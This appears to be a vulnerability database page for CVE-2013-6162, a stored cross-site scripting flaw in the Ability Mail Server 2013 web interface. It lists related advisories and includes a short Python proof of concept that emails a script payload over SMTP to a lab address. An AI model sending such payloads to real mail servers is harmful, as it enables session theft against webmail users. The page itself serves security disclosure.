Ability Mail Server 2013 (3.1.1) - Stored XSS (Web UI)

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Ability Mail Server 2013 Stored XSS vulnerability in web U

Reporter	Title	Published	Views	Family All 11
0day.today	Ability Mail Server 2013 (3.1.1) - Stored XSS Vulnerability	17 Dec 201300:00	–	zdt
Circl	CVE-2013-6162	17 Dec 201300:00	–	circl
CVE	CVE-2013-6162	21 Dec 201300:00	–	cve
Cvelist	CVE-2013-6162	21 Dec 201300:00	–	cvelist
Exploit DB	Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting	17 Dec 201300:00	–	exploitdb
EUVD	EUVD-2013-5991	7 Oct 202500:30	–	euvd
exploitpack	Ability-Mail-Server-2013	4 Jan 201517:21	–	exploitpack
exploitpack	Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting	17 Dec 201300:00	–	exploitpack
NVD	CVE-2013-6162	21 Dec 201300:55	–	nvd
Prion	Cross site scripting	21 Dec 201300:55	–	prion


                                                #!/usr/bin/env python

&#39;&#39;&#39;
Exploit Title: Ability Mail Server 2013 Stored XSS
Date: 12/20/2013
Exploit Author: David Um
Vendor Homepage: http://www.code-crafters.com/
Software Link: http://download.code-crafters.com/ams.exe
Version: 3.1.1
Tested on: Windows Server 2003 SP2
CVE : CVE-2013-6162
Description: This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail.
&#39;&#39;&#39;

import smtplib

email_addr = &#39;[email protected]&#39;

email = &#39;From: %s\n&#39; % email_addr
email += &#39;To: %s\n&#39; % email_addr
email += &#39;Subject: XSS\n&#39;
email += &#39;Content-type: text/html\n\n&#39;
email += &#39;&#60;script&#62;alert(&#34;XSS&#34;)&#60;/script&#62;&#39;
s = smtplib.SMTP(&#39;192.168.58.140&#39;, 25)

s.login(email_addr, &#34;user&#34;)
s.sendmail(email_addr, email_addr, email)
s.quit()

01 Jul 2014 00:00Current

6.5Medium risk

Vulners AI Score6.5

EPSS0.00519